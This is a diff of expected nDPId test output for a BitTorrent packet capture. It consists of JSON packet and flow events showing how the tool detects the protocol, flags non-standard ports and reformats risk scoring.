 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="}
 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="}
 01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="}
 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00720{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="}
 01375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="}
 01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="}
-00714{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00660{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7440000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00717{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00717{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
